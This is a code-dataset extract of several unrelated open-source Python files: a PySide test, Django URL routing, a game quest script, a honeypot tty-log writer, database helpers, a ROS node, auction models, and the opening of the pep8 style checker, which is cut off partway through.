| 8,297
|
#############################################################################
##
## Copyright (C) 2016 The Qt Company Ltd.
## Contact: https://www.qt.io/licensing/
##
## This file is part of the test suite of PySide2.
##
## $QT_BEGIN_LICENSE:GPL-EXCEPT$
## Commercial License Usage
## Licensees holding valid commercial Qt licenses may use this file in
## accordance with the commercial license agreement provided with the
## Software or, alternatively, in accordance with the terms contained in
## a written agreement between you and The Qt Company. For licensing terms
## and conditions see https://www.qt.io/terms-conditions. For further
## information use the contact form at https://www.qt.io/contact-us.
##
## GNU General Public License Usage
## Alternatively, this file may be used under the terms of the GNU
## General Public License version 3 as published by the Free Software
## Foundation with exceptions as appearing in the file LICENSE.GPL3-EXCEPT
## included in the packaging of this file. Please review the following
## information to ensure the GNU General Public License requirements will
## be met: https://www.gnu.org/licenses/gpl-3.0.html.
##
## $QT_END_LICENSE$
##
#############################################################################
from __future__ import division
from sample import *
import unittest
class TestNewDivision(unittest.TestCase):
    """Check that the bound Point type supports true division (PEP 238)."""

    def testIt(self):
        """Dividing a Point by a scalar should halve each coordinate."""
        original = Point(4, 4)
        halved = original / 2
        expected = Point(2, 2)
        self.assertEqual(halved, expected)
# Allow running this test file directly from the command line.
if __name__ == "__main__":
    unittest.main()
|
qtproject/pyside-shiboken
|
tests/samplebinding/newdivision_test.py
|
Python
|
gpl-2.0
| 1,532
|
# URL routing for the accountability_tracker Django project.
from django.conf import settings
from django.conf.urls import patterns, include, url
# Fix: static() is called below when DEBUG and MEDIA_ROOT are set, but was
# never imported, which raised NameError at import time in that configuration.
from django.conf.urls.static import static
from django.core.urlresolvers import reverse
from django.views.generic import TemplateView
from django.views.generic.base import RedirectView
from django.contrib import admin
import os
import logging
logger = logging.getLogger("accountability_tracker")
from django.contrib import admin
admin.autodiscover()
urlpatterns = [
    url(r"^admin/doc/", include("django.contrib.admindocs.urls")),
    url(r"^admin/", include(admin.site.urls)),
    # url pattern to kick root to index of cali_water application
    url(r"^monthly-water-use/", include("cali_water.urls")),
    # url pattern to kick root to index of election_profiles application
    url(r"^2015-la-election-guide/", include("election_profiles.urls")),
    # url pattern to kick root to index of see_change application
    url(r"^see-change/", include("see_change.urls")),
    # url pattern to kick root to index of maplight_finance application
    url(r"", include("maplight_finance.urls")),
    # batch edit in admin
    url(r"^admin/", include("massadmin.urls")),
]
if settings.DEBUG:
    # Mount the debug toolbar only in development.
    import debug_toolbar
    urlpatterns += patterns('',
        url(r'^__debug__/', include(debug_toolbar.urls)),
    )
if settings.DEBUG and settings.MEDIA_ROOT:
    # Serve uploaded media straight from Django during development.
    urlpatterns += static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)
|
SCPR/accountability-tracker
|
accountability_tracker/urls.py
|
Python
|
gpl-2.0
| 1,388
|
# Maked by Mr. Have fun! Version 0.2
print "importing quests: 169: Nightmare Children"
import sys
from net.sf.l2j.gameserver.model.quest import State
from net.sf.l2j.gameserver.model.quest import QuestState
from net.sf.l2j.gameserver.model.quest.jython import QuestJython as JQuest
CRACKED_SKULL_ID = 1030
PERFECT_SKULL_ID = 1031
BONE_GAITERS_ID = 31
class Quest (JQuest) :
    """Quest 169 "Nightmare Children" (Jython quest script for L2J).

    State variables kept on the QuestState: "cond" (progress), "onlyone"
    (1 once completed), "id" (scratch marker used by the event handler).
    """
    def __init__(self,id,name,descr): JQuest.__init__(self,id,name,descr)
    def onEvent (self,event,st) :
        """Handle a dialog event; returns the html page to display."""
        htmltext = event
        if event == "1" :
            # Player accepted the quest.
            st.set("id","0")
            htmltext = "7145-04.htm"
            st.set("cond","1")
            st.setState(STARTED)
            st.playSound("ItemSound.quest_accept")
        elif event == "169_1" and int(st.get("onlyone")) == 0 :
            if int(st.get("id")) != 169 :
                st.set("id","169")
                htmltext = "7145-08.htm"
                # Reward: Bone Gaiters plus 17150 adena (item id 57), and
                # take back all collected skulls.
                st.giveItems(BONE_GAITERS_ID,1)
                st.giveItems(57,17150)
                st.takeItems(CRACKED_SKULL_ID,st.getQuestItemsCount(CRACKED_SKULL_ID))
                st.takeItems(PERFECT_SKULL_ID,st.getQuestItemsCount(PERFECT_SKULL_ID))
                st.set("cond","0")
                st.setState(COMPLETED)
                st.playSound("ItemSound.quest_finish")
                st.set("onlyone","1")
        return htmltext
    def onTalk (Self,npc,st):
        """Handle talking to NPC 7145.

        Note: the instance parameter is spelled ``Self`` in the original;
        it still receives the instance, so behavior is unaffected.
        """
        npcId = npc.getNpcId()
        htmltext = "<html><head><body>I have nothing to say you</body></html>"
        id = st.getState()
        if id == CREATED :
            # First contact: reset all quest variables.
            st.setState(STARTING)
            st.set("cond","0")
            st.set("onlyone","0")
            st.set("id","0")
        if npcId == 7145 and int(st.get("cond"))==0 and int(st.get("onlyone"))==0 :
            # NOTE(review): "cond" was just checked to be 0, so this
            # comparison to 15 is always true; it looks like the player
            # level was intended here -- confirm against the else branch.
            if int(st.get("cond"))<15 :
                if st.getPlayer().getRace().ordinal() != 2 :
                    # Wrong race: quest only available to race ordinal 2.
                    htmltext = "7145-00.htm"
                elif st.getPlayer().getLevel() >= 15 :
                    # Eligible: show the quest offer and return immediately.
                    htmltext = "7145-03.htm"
                    return htmltext
                else:
                    # Level too low.
                    htmltext = "7145-02.htm"
                    st.exitQuest(1)
            else:
                htmltext = "7145-02.htm"
                st.exitQuest(1)
        elif npcId == 7145 and int(st.get("cond"))==0 and int(st.get("onlyone"))==1 :
            htmltext = "<html><head><body>This quest have already been completed.</body></html>"
        elif npcId == 7145 and int(st.get("cond")) :
            # Quest in progress: choose the page based on collected skulls.
            if st.getQuestItemsCount(CRACKED_SKULL_ID) >= 1 and st.getQuestItemsCount(PERFECT_SKULL_ID) == 0 :
                htmltext = "7145-06.htm"
            elif st.getQuestItemsCount(PERFECT_SKULL_ID) >= 1 :
                htmltext = "7145-07.htm"
            elif st.getQuestItemsCount(CRACKED_SKULL_ID) == 0 and st.getQuestItemsCount(PERFECT_SKULL_ID) == 0 :
                htmltext = "7145-05.htm"
        return htmltext
    def onKill (self,npc,st):
        """Handle kills of the two quest monsters (npc ids 105 and 25):
        30% chance of a perfect skull (only while none held), otherwise
        60% chance of a cracked skull."""
        npcId = npc.getNpcId()
        if npcId == 105 :
            st.set("id","0")
            if int(st.get("cond")) == 1 :
                if st.getRandom(10)>7 and st.getQuestItemsCount(PERFECT_SKULL_ID) == 0 :
                    st.giveItems(PERFECT_SKULL_ID,1)
                    st.playSound("ItemSound.quest_middle")
                if st.getRandom(10)>4 :
                    st.giveItems(CRACKED_SKULL_ID,1)
                    st.playSound("ItemSound.quest_itemget")
        elif npcId == 25 :
            # Same drop logic as npc 105.
            st.set("id","0")
            if int(st.get("cond")) == 1 :
                if st.getRandom(10)>7 and st.getQuestItemsCount(PERFECT_SKULL_ID) == 0 :
                    st.giveItems(PERFECT_SKULL_ID,1)
                    st.playSound("ItemSound.quest_middle")
                if st.getRandom(10)>4 :
                    st.giveItems(CRACKED_SKULL_ID,1)
                    st.playSound("ItemSound.quest_itemget")
        return
# Instantiate the quest and its four states, then register the NPC and
# monster hooks with the quest engine.
QUEST = Quest(169,"169_NightmareChildren","Nightmare Children")
CREATED = State('Start', QUEST)
STARTING = State('Starting', QUEST)
STARTED = State('Started', QUEST)
COMPLETED = State('Completed', QUEST)
QUEST.setInitialState(CREATED)
# NPC 7145 starts the quest and handles dialog in both active states.
QUEST.addStartNpc(7145)
STARTING.addTalkId(7145)
STARTED.addTalkId(7145)
# Monsters 105 and 25 drop the quest skulls while the quest is STARTED.
STARTED.addKillId(105)
STARTED.addKillId(25)
STARTED.addQuestDrop(105,CRACKED_SKULL_ID,1)
STARTED.addQuestDrop(25,CRACKED_SKULL_ID,1)
STARTED.addQuestDrop(105,PERFECT_SKULL_ID,1)
STARTED.addQuestDrop(25,PERFECT_SKULL_ID,1)
|
Barrog/C4-Datapack
|
data/jscript/quests/169_NightmareChildren/__init__.py
|
Python
|
gpl-2.0
| 3,977
|
# Copyright (c) 2009 Upi Tamminen <desaster@gmail.com>
# See the COPYRIGHT file for more information
# Should be compatible with user mode linux
import struct, sys
OP_OPEN, OP_CLOSE, OP_WRITE, OP_EXEC = 1, 2, 3, 4
TYPE_INPUT, TYPE_OUTPUT, TYPE_INTERACT = 1, 2, 3
def ttylog_write(logfile, len, direction, stamp, data = None):
    """Append a data record (OP_WRITE) to a UML-compatible tty log.

    logfile   -- path of the log file (appended to; created if missing)
    len       -- payload length in bytes (name kept for backward
                 compatibility with existing callers; shadows builtin len)
    direction -- one of TYPE_INPUT, TYPE_OUTPUT, TYPE_INTERACT
    stamp     -- timestamp as float seconds since the epoch
    data      -- payload bytes; no payload is written when None
    """
    sec, usec = int(stamp), int(1000000 * (stamp - int(stamp)))
    # 'with' + open() replaces the Python-2-only file() builtin and
    # guarantees the handle is closed even if a write fails.
    with open(logfile, 'ab') as f:
        f.write(struct.pack('<iLiiLL', 3, 0, len, direction, sec, usec))
        # Fix: the original called f.write(data) unconditionally, raising
        # TypeError whenever the documented default data=None was used.
        if data is not None:
            f.write(data)
def ttylog_open(logfile, stamp):
    """Append a session-open record (OP_OPEN) to a UML-compatible tty log.

    logfile -- path of the log file (appended to; created if missing)
    stamp   -- timestamp as float seconds since the epoch
    """
    sec, usec = int(stamp), int(1000000 * (stamp - int(stamp)))
    # open() + 'with' instead of the Python-2-only file() builtin; the
    # handle is closed even if the write fails.
    with open(logfile, 'ab') as f:
        f.write(struct.pack('<iLiiLL', 1, 0, 0, 0, sec, usec))
def ttylog_close(logfile, stamp):
    """Append a session-close record (OP_CLOSE) to a UML-compatible tty log.

    logfile -- path of the log file (appended to; created if missing)
    stamp   -- timestamp as float seconds since the epoch
    """
    sec, usec = int(stamp), int(1000000 * (stamp - int(stamp)))
    # open() + 'with' instead of the Python-2-only file() builtin; the
    # handle is closed even if the write fails.
    with open(logfile, 'ab') as f:
        f.write(struct.pack('<iLiiLL', 2, 0, 0, 0, sec, usec))
# vim: set sw=4 et:
|
jullrich/dshieldhoneypot
|
kippo/kippo-0.8/kippo/core/ttylog.py
|
Python
|
gpl-2.0
| 943
|
from typing import Any
from flask import g
class ReferenceSystem:
    """Database access for external reference systems (e.g. Wikidata,
    GeoNames) stored partly in model.entity and partly in
    web.reference_system.  All methods run raw SQL through the
    request-scoped cursor ``g.cursor``."""

    @staticmethod
    def get_all() -> list[dict[str, Any]]:
        """Return every reference system joined with its entity row,
        usage count (P67 links) and attached types (P2 links)."""
        g.cursor.execute("""
            SELECT
                e.id, e.name,
                e.cidoc_class_code,
                e.description,
                e.openatlas_class_name,
                e.created,
                e.modified,
                rs.website_url,
                rs.resolver_url,
                rs.identifier_example,
                rs.system,
                COUNT(l.id) AS count,
                array_to_json(
                    array_agg((t.range_id, t.description))
                    FILTER (WHERE t.range_id IS NOT NULL)
                ) AS types
            FROM model.entity e
            JOIN web.reference_system rs ON e.id = rs.entity_id
            LEFT JOIN model.link l ON e.id = l.domain_id
                AND l.property_code = 'P67'
            LEFT JOIN model.link t ON e.id = t.domain_id
                AND t.property_code = 'P2'
            GROUP BY
                e.id,
                e.name,
                e.cidoc_class_code,
                e.description,
                e.openatlas_class_name,
                e.created,
                e.modified,
                rs.website_url,
                rs.resolver_url,
                rs.identifier_example,
                rs.system, rs.entity_id;""")
        return [dict(row) for row in g.cursor.fetchall()]

    @staticmethod
    def add_classes(entity_id: int, class_names: list[str]) -> None:
        """Allow the reference system to be used with each named class."""
        for name in class_names:
            g.cursor.execute(
                """
                INSERT INTO web.reference_system_openatlas_class (
                    reference_system_id, openatlas_class_name)
                VALUES (%(entity_id)s, %(name)s);""",
                {'entity_id': entity_id, 'name': name})

    @staticmethod
    def remove_class(entity_id: int, class_name: str) -> None:
        """Detach a single class from the reference system."""
        g.cursor.execute(
            """
            DELETE FROM web.reference_system_openatlas_class
            WHERE reference_system_id = %(reference_system_id)s
                AND openatlas_class_name = %(class_name)s;""",
            {'reference_system_id': entity_id, 'class_name': class_name})

    @staticmethod
    def update_system(data: dict[str, Any]) -> None:
        """Update the editable fields of an existing reference system.
        ``data`` must contain name, website_url, resolver_url,
        identifier_example and entity_id keys."""
        g.cursor.execute("""
            UPDATE web.reference_system
            SET (name, website_url, resolver_url, identifier_example)
            = (
                %(name)s,
                %(website_url)s,
                %(resolver_url)s,
                %(identifier_example)s)
            WHERE entity_id = %(entity_id)s;""", data)

    @staticmethod
    def insert_system(data: dict[str, Any]) -> None:
        """Create the web.reference_system row for an existing entity.
        ``data`` must contain entity_id, name, website_url and
        resolver_url keys."""
        g.cursor.execute(
            """
            INSERT INTO web.reference_system (
                entity_id, name, website_url, resolver_url)
            VALUES (
                %(entity_id)s, %(name)s, %(website_url)s, %(resolver_url)s);""",
            data)

    @staticmethod
    def delete_links_from_entity(entity_id: int) -> None:
        """Remove all reference-system links (P67) pointing at an entity.
        Relies on ``g.reference_systems`` being non-empty (the IN tuple
        would be invalid SQL otherwise)."""
        g.cursor.execute(
            """
            DELETE FROM model.link l
            WHERE property_code = 'P67'
                AND domain_id IN %(systems_ids)s
                AND range_id = %(entity_id)s;""",
            {
                'systems_ids': tuple(g.reference_systems.keys()),
                'entity_id': entity_id})
|
craws/OpenAtlas
|
openatlas/database/reference_system.py
|
Python
|
gpl-2.0
| 3,447
|
#!/usr/bin/env python
import roslib; roslib.load_manifest("gki_sickrd_task")
import rospy
import math
import threading
from gki_sickrd_task.estop_guard import EstopGuard
from gki_sickrd_task.params import Params
from std_msgs.msg import Float32
class WorldmodelAgeing(object):
    """Publishes the worldmodel ageing rate once per second, pausing
    while the emergency stop is active."""
    def __init__(self):
        # NOTE(review): rospy.Publisher without queue_size triggers a
        # deprecation warning on newer ROS releases -- confirm target version.
        self.worldmodel_ageing_publisher = rospy.Publisher('/worldmodel/object_ageing', Float32)
        # Current e-stop state; publishing is suppressed while True.
        self.stop = False
        self.last_ageing = rospy.Time.now()
        # Fire ageing_cb once per second.
        rospy.Timer(rospy.Duration(1.0), self.ageing_cb)
        EstopGuard.add_callback(self.estop_changed_cb)
    def estop_changed_cb(self, stop):
        # Remember the latest emergency-stop state reported by EstopGuard.
        self.stop = stop
    def ageing_cb(self, event):
        # Timer callback: publish the configured ageing rate unless e-stopped.
        if not self.stop:
            self.worldmodel_ageing_publisher.publish(Float32(data=Params().worldmodel_ageing_rate))
if __name__ == "__main__":
    # Start the ROS node and keep servicing timer callbacks until shutdown.
    rospy.init_node("worldmodel_ageing")
    ageing = WorldmodelAgeing()
    rospy.spin()
|
GKIFreiburg/gki_sickrd2014
|
gki_sickrd_task/scripts/worldmodel_ageing.py
|
Python
|
gpl-2.0
| 856
|
# Public API of this module.
# Fix: the names were previously listed as bare identifiers, which raised
# NameError at import time (the classes are defined further down the file)
# and would not satisfy `from ... import *` anyway, which requires strings.
__all__ = [
    'AttributeAuction',
    'RankedAuction',
    'Round',
    'WinnerTakesAllAuction',
]
import operator

from google.appengine.ext import ndb
from google.appengine.ext.ndb import polymodel

from .thronewar import ThroneWar
class Round(ndb.Model):
    """
    An auction round in the throne war. A throne war may have multiple
    auction rounds, resulting in only some things being bidded on at a given
    time.
    """
    # Parent throne war this round belongs to.
    # NOTE(review): `collection_name` is an argument of the older
    # db.ReferenceProperty API; ndb's KeyProperty does not accept it --
    # confirm against the ndb version in use.
    thronewar = ndb.KeyProperty(kind=ThroneWar, collection_name='rounds')
    # Position of this round relative to the war's other rounds.
    order = ndb.IntegerProperty(default=0)
class Auction(polymodel.PolyModel):
    """
    An auction within a round
    """
    # Round this auction belongs to (see NOTE on Round.thronewar about
    # the `collection_name` argument).
    bid_round = ndb.KeyProperty(kind=Round, collection_name='auctions')
    name = ndb.StringProperty()
    description = ndb.TextProperty()
    # Bid seed and bounds; 0 means no constraint/default.
    default_bid = ndb.IntegerProperty(default=0)
    min_initial_bid = ndb.IntegerProperty(default=0)
    max_initial_bid = ndb.IntegerProperty(default=0)
    @property
    def ranked(self):
        """
        Return bids in ranked order.
        """
        # NOTE(review): `self.bids` is presumably a backreference/query
        # supplied elsewhere -- it is not defined in this module; verify.
        # Only positive locked bids participate; highest bid first.
        return sorted(
            filter(
                lambda bid: bid.locked_bid > 0,
                self.bids
            ),
            key=operator.attrgetter('locked_bid'),
            reverse=True
        )
    @property
    def unranked(self):
        """
        Return all unranked bids.
        """
        # Bids whose locked bid is exactly 0, i.e. not yet committed.
        return filter(
            lambda bid: bid.locked_bid == 0,
            self.bids
        )
class AttributeAuction(Auction):
    """
    An attribute auction -- ie this can be sold down
    """
    # Allowed sell-down amounts and the display name for each rung.
    # NOTE(review): ndb has no ListProperty (that name comes from the db
    # API) -- confirm against the intended datastore API.
    selldown_rungs = ndb.ListProperty(int, default=[-25, -10])
    selldown_names = ndb.StringListProperty(default=['human', 'chaos'])
    # TODO allow bidding down if the locked_bid is 0.
    @property
    def unranked(self):
        """
        Sell-downs are secret.
        """
        # Unlike the base class, zero AND negative (sell-down) bids are
        # kept out of the ranking here.
        return filter(
            lambda bid: bid.locked_bid <= 0,
            self.bids
        )
class RankedAuction(Auction):
    """
    A power auction -- ie this can't be sold down
    """
    # Extra rung values for the ranking; exact semantics not shown in this
    # module (NOTE(review): inferred from the name only -- confirm).
    virtual_rungs = ndb.ListProperty(int)
class WinnerTakesAllAuction(Auction):
    """
    A winner-takes-all auction -- ie, auctioning off the captain of the
    castle guard position.
    """
    @property
    def ranked(self):
        """
        Only the highest bid counts.
        """
        # Sort all bids descending and keep just the top one.
        return sorted(
            self.bids,
            key=operator.attrgetter('locked_bid'),
            reverse=True
        )[:1]
    @property
    def unranked(self):
        # Everything except the single winning bid.
        return sorted(
            self.bids,
            key=operator.attrgetter('locked_bid'),
            reverse=True
        )[1:]
|
svirpridon/labordaythronewar
|
models/auctions.py
|
Python
|
gpl-3.0
| 2,613
|
#!/usr/bin/env python
# pep8.py - Check Python source code formatting, according to PEP 8
# Copyright (C) 2006-2009 Johann C. Rocholl <johann@rocholl.net>
# Copyright (C) 2009-2014 Florent Xicluna <florent.xicluna@gmail.com>
# Copyright (C) 2014 Ian Lee <ianlee1521@gmail.com>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
r"""
Check Python source code formatting, according to PEP 8.
For usage and a list of options, try this:
$ python pep8.py -h
This program and its regression test suite live here:
http://github.com/jcrocholl/pep8
Groups of errors and warnings:
E errors
W warnings
100 indentation
200 whitespace
300 blank lines
400 imports
500 line length
600 deprecation
700 statements
900 syntax error
"""
from __future__ import with_statement
import os
import sys
import re
import time
import inspect
import keyword
import tokenize
from optparse import OptionParser
from fnmatch import fnmatch
try:
from configparser import RawConfigParser
from io import TextIOWrapper
except ImportError:
from ConfigParser import RawConfigParser
__version__ = '1.6.0a0'
# Comma-separated defaults for --exclude and --ignore.
DEFAULT_EXCLUDE = '.svn,CVS,.bzr,.hg,.git,__pycache__,.tox'
DEFAULT_IGNORE = 'E121,E123,E126,E226,E24,E704'
try:
    if sys.platform == 'win32':
        DEFAULT_CONFIG = os.path.expanduser(r'~\.pep8')
    else:
        DEFAULT_CONFIG = os.path.join(os.getenv('XDG_CONFIG_HOME') or
                                      os.path.expanduser('~/.config'), 'pep8')
except ImportError:
    DEFAULT_CONFIG = None
PROJECT_CONFIG = ('setup.cfg', 'tox.ini', '.pep8')
TESTSUITE_PATH = os.path.join(os.path.dirname(__file__), 'testsuite')
# NOTE(review): the docstrings below still describe a 79-character limit;
# this copy raises the default to 150 -- confirm that is intentional.
MAX_LINE_LENGTH = 150
REPORT_FORMAT = {
    'default': '%(path)s:%(row)d:%(col)d: %(code)s %(text)s',
    'pylint': '%(path)s:%(row)d: [%(code)s] %(text)s',
}
# Flag for compile() to produce an AST instead of executing code.
PyCF_ONLY_AST = 1024
SINGLETONS = frozenset(['False', 'None', 'True'])
# All keywords except the singletons, plus 'print' (a keyword on Python 2).
KEYWORDS = frozenset(keyword.kwlist + ['print']) - SINGLETONS
UNARY_OPERATORS = frozenset(['>>', '**', '*', '+', '-'])
ARITHMETIC_OP = frozenset(['**', '*', '/', '//', '+', '-'])
WS_OPTIONAL_OPERATORS = ARITHMETIC_OP.union(['^', '&', '|', '<<', '>>', '%'])
WS_NEEDED_OPERATORS = frozenset([
    '**=', '*=', '/=', '//=', '+=', '-=', '!=', '<>', '<', '>',
    '%=', '^=', '&=', '|=', '==', '<=', '>=', '<<=', '>>=', '='])
WHITESPACE = frozenset(' \t')
NEWLINE = frozenset([tokenize.NL, tokenize.NEWLINE])
SKIP_TOKENS = NEWLINE.union([tokenize.INDENT, tokenize.DEDENT])
# ERRORTOKEN is triggered by backticks in Python 3
SKIP_COMMENTS = SKIP_TOKENS.union([tokenize.COMMENT, tokenize.ERRORTOKEN])
BENCHMARK_KEYS = ['directories', 'files', 'logical lines', 'physical lines']
# Precompiled regexes used by the check functions below.
INDENT_REGEX = re.compile(r'([ \t]*)')
RAISE_COMMA_REGEX = re.compile(r'raise\s+\w+\s*,')
RERAISE_COMMA_REGEX = re.compile(r'raise\s+\w+\s*,.*,\s*\w+\s*$')
ERRORCODE_REGEX = re.compile(r'\b[A-Z]\d{3}\b')
DOCSTRING_REGEX = re.compile(r'u?r?["\']')
EXTRANEOUS_WHITESPACE_REGEX = re.compile(r'[[({] | []}),;:]')
WHITESPACE_AFTER_COMMA_REGEX = re.compile(r'[,;:]\s*(?: |\t)')
COMPARE_SINGLETON_REGEX = re.compile(r'\b(None|False|True)?\s*([=!]=)'
                                     r'\s*(?(1)|(None|False|True))\b')
COMPARE_NEGATIVE_REGEX = re.compile(r'\b(not)\s+[^][)(}{ ]+\s+(in|is)\s')
COMPARE_TYPE_REGEX = re.compile(r'(?:[=!]=|is(?:\s+not)?)\s*type(?:s.\w+Type'
                                r'|\s*\(\s*([^)]*[^ )])\s*\))')
KEYWORD_REGEX = re.compile(r'(\s*)\b(?:%s)\b(\s*)' % r'|'.join(KEYWORDS))
OPERATOR_REGEX = re.compile(r'(?:[^,\s])(\s*)(?:[-+*/|!<=>%&^]+)(\s*)')
LAMBDA_REGEX = re.compile(r'\blambda\b')
HUNK_REGEX = re.compile(r'^@@ -\d+(?:,\d+)? \+(\d+)(?:,(\d+))? @@.*$')
# Work around Python < 2.6 behaviour, which does not generate NL after
# a comment which is on a line by itself.
COMMENT_WITH_NL = tokenize.generate_tokens(['#\n'].pop).send(None)[1] == '#\n'
##############################################################################
# Plugins (check functions) for physical lines
##############################################################################
def tabs_or_spaces(physical_line, indent_char):
    r"""Never mix tabs and spaces.
    The most popular way of indenting Python is with spaces only. The
    second-most popular way is with tabs only. Code indented with a mixture
    of tabs and spaces should be converted to using spaces exclusively. When
    invoking the Python command line interpreter with the -t option, it issues
    warnings about code that illegally mixes tabs and spaces. When using -tt
    these warnings become errors. These options are highly recommended!
    Okay: if a == 0:\n        a = 1\n        b = 1
    E101: if a == 0:\n        a = 1\n\tb = 1
    """
    # (Docstring kept verbatim: pep8's own testsuite parses the embedded
    # Okay:/Exxx: examples.)
    leading = INDENT_REGEX.match(physical_line).group(1)
    mismatch = next(
        (pos for pos, ch in enumerate(leading) if ch != indent_char), None)
    if mismatch is not None:
        return mismatch, "E101 indentation contains mixed spaces and tabs"
def tabs_obsolete(physical_line):
    r"""For new projects, spaces-only are strongly recommended over tabs.
    Okay: if True:\n    return
    W191: if True:\n\treturn
    """
    # str.find returns -1 when absent, so a single call replaces the
    # original "in" test plus index() lookup.
    leading = INDENT_REGEX.match(physical_line).group(1)
    tab_position = leading.find('\t')
    if tab_position != -1:
        return tab_position, "W191 indentation contains tabs"
def trailing_whitespace(physical_line):
    r"""Trailing whitespace is superfluous.
    The warning returned varies on whether the line itself is blank, for easier
    filtering for those who want to indent their blank lines.
    Okay: spam(1)\n#
    W291: spam(1) \n#
    W293: class Foo(object):\n    \n    bang = 12
    """
    # Strip the newline (chr 10), carriage return (chr 13) and form feed
    # (chr 12) in one chained pass, then look for leftover whitespace.
    line = physical_line.rstrip('\n').rstrip('\r').rstrip('\x0c')
    stripped = line.rstrip(' \t\v')
    if line == stripped:
        return None
    if stripped:
        return len(stripped), "W291 trailing whitespace"
    return 0, "W293 blank line contains whitespace"
def trailing_blank_lines(physical_line, lines, line_number, total_lines):
    r"""Trailing blank lines are superfluous.
    Okay: spam(1)
    W391: spam(1)\n
    However the last line should end with a new line (warning W292).
    """
    # Only the very last physical line of the file is interesting.
    if line_number != total_lines:
        return
    stripped = physical_line.rstrip()
    if not stripped:
        return 0, "W391 blank line at end of file"
    if stripped == physical_line:
        return len(physical_line), "W292 no newline at end of file"
def maximum_line_length(physical_line, max_line_length, multiline):
    r"""Limit all lines to a maximum of 79 characters.
    There are still many devices around that are limited to 80 character
    lines; plus, limiting windows to 80 characters makes it possible to have
    several windows side-by-side. The default wrapping on such devices looks
    ugly. Therefore, please limit all lines to a maximum of 79 characters.
    For flowing long blocks of text (docstrings or comments), limiting the
    length to 72 characters is recommended.
    Reports error E501.
    """
    line = physical_line.rstrip()
    length = len(line)
    # `noqa` is a module-level helper defined elsewhere in this file; it
    # suppresses the check for lines carrying a "# noqa" marker.
    if length > max_line_length and not noqa(line):
        # Special case for long URLs in multi-line docstrings or comments,
        # but still report the error when the 72 first chars are whitespaces.
        chunks = line.split()
        if ((len(chunks) == 1 and multiline) or
            (len(chunks) == 2 and chunks[0] == '#')) and \
                len(line) - len(chunks[-1]) < max_line_length - 7:
            return
        if hasattr(line, 'decode'):   # Python 2
            # The line could contain multi-byte characters
            try:
                length = len(line.decode('utf-8'))
            except UnicodeError:
                pass
        if length > max_line_length:
            return (max_line_length, "E501 line too long "
                    "(%d > %d characters)" % (length, max_line_length))
##############################################################################
# Plugins (check functions) for logical lines
##############################################################################
def blank_lines(logical_line, blank_lines, indent_level, line_number,
                blank_before, previous_logical, previous_indent_level):
    r"""Separate top-level function and class definitions with two blank lines.
    Method definitions inside a class are separated by a single blank line.
    Extra blank lines may be used (sparingly) to separate groups of related
    functions. Blank lines may be omitted between a bunch of related
    one-liners (e.g. a set of dummy implementations).
    Use blank lines in functions, sparingly, to indicate logical sections.
    Okay: def a():\n    pass\n\n\ndef b():\n    pass
    Okay: def a():\n    pass\n\n\n# Foo\n# Bar\n\ndef b():\n    pass
    E301: class Foo:\n    b = 0\n    def bar():\n        pass
    E302: def a():\n    pass\n\ndef b(n):\n    pass
    E303: def a():\n    pass\n\n\n\ndef b(n):\n    pass
    E303: def a():\n\n\n\n    pass
    E304: @decorator\n\ndef a():\n    pass
    """
    if line_number < 3 and not previous_logical:
        return  # Don't expect blank lines before the first line
    if previous_logical.startswith('@'):
        # A decorator must be immediately followed by its function/class.
        if blank_lines:
            yield 0, "E304 blank lines found after function decorator"
    elif blank_lines > 2 or (indent_level and blank_lines == 2):
        # More blank lines than any context allows.
        yield 0, "E303 too many blank lines (%d)" % blank_lines
    elif logical_line.startswith(('def ', 'class ', '@')):
        if indent_level:
            # Nested definition (method): expects exactly one blank line
            # unless it follows the class header or a docstring.
            if not (blank_before or previous_indent_level < indent_level or
                    DOCSTRING_REGEX.match(previous_logical)):
                yield 0, "E301 expected 1 blank line, found 0"
        elif blank_before != 2:
            # Top-level definition: expects exactly two blank lines.
            yield 0, "E302 expected 2 blank lines, found %d" % blank_before
def extraneous_whitespace(logical_line):
    r"""Avoid extraneous whitespace.
    Avoid extraneous whitespace in these situations:
    - Immediately inside parentheses, brackets or braces.
    - Immediately before a comma, semicolon, or colon.
    Okay: spam(ham[1], {eggs: 2})
    E201: spam( ham[1], {eggs: 2})
    E201: spam(ham[ 1], {eggs: 2})
    E201: spam(ham[1], { eggs: 2})
    E202: spam(ham[1], {eggs: 2} )
    E202: spam(ham[1 ], {eggs: 2})
    E202: spam(ham[1], {eggs: 2 })
    E203: if x == 4: print x, y; x, y = y , x
    E203: if x == 4: print x, y ; x, y = y, x
    E203: if x == 4 : print x, y; x, y = y, x
    """
    line = logical_line
    # Each match is two characters: either "<opener><space>" or
    # "<space><closer/punct>".
    for match in EXTRANEOUS_WHITESPACE_REGEX.finditer(line):
        found = match.start()
        text = match.group()
        char = text.strip()
        if text[1] == ' ':
            # whitespace right after an opening bracket: '(', '[' or '{'
            yield found + 1, "E201 whitespace after '%s'" % char
        elif line[found - 1] != ',':
            # whitespace before a closer or before ',', ';', ':' -- unless
            # it directly follows a comma (handled by another check)
            code = 'E202' if char in '}])' else 'E203'
            yield found, "%s whitespace before '%s'" % (code, char)
def whitespace_around_keywords(logical_line):
    r"""Avoid extraneous whitespace around keywords.
    Okay: True and False
    E271: True and  False
    E272: True  and False
    E273: True and\tFalse
    E274: True\tand False
    """
    # Check the whitespace captured before (group 1) and after (group 2)
    # each keyword with the same tab/multi-space rules.
    for match in KEYWORD_REGEX.finditer(logical_line):
        before, after = match.groups()
        checks = (
            (1, before, "E274 tab before keyword",
             "E272 multiple spaces before keyword"),
